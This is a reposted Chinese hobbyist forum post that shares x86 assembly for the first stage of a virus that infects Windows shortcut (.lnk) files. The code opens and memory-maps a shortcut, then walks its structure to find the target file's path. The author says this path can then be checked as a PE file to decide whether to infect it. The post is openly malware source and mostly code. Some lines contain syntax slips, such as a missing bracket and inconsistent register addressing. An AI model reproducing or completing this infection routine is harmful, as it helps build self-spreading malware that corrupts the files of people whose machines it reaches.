[转载]一段感染快捷方式的简短代码
文章作者:我也想知道我在网上看到很少有关于快捷方式的代码
在莫国防上看到一段
但觉得太长很多的判断不知是为什么
我就自己写了一段代码
push 0
push 80h
push 3
push 0
push 1
push 80000000h
lea eax,filename[ebx]
push eax
call _CreateFile[ebx
cmp eax,INVALID_HANDLE_VALUE
jz infect_lnk_exit
mov hFile,eax
push 0
push 0
push 0
push 2
push 0
push hFile[ebx]
call _CreateFileMapping[ebx]
or eax,eax
jz @1
mov hMapping[ebx],eax
push 0
push 0
push 0
push 4
push hMapping[ebx]
call MapViewOfFile
or eax,eax
jz @2
mov _pMapping[ebx],eax
mov esi,pMapping
add esi,4ch
movzx ecx,word ptr [esi]
add esi,2
add esi,ecx
mov ecx,[esi+10h]
add esi,ecx
到这里esi就指向快捷方式所指向文件名的地址
后面大家就可以向平常判段PE文件的方法来确定要不要感染这个文件
以上都是我个人的见解应为我是个菜鸟有不对的地方请高手指出
页:
[1]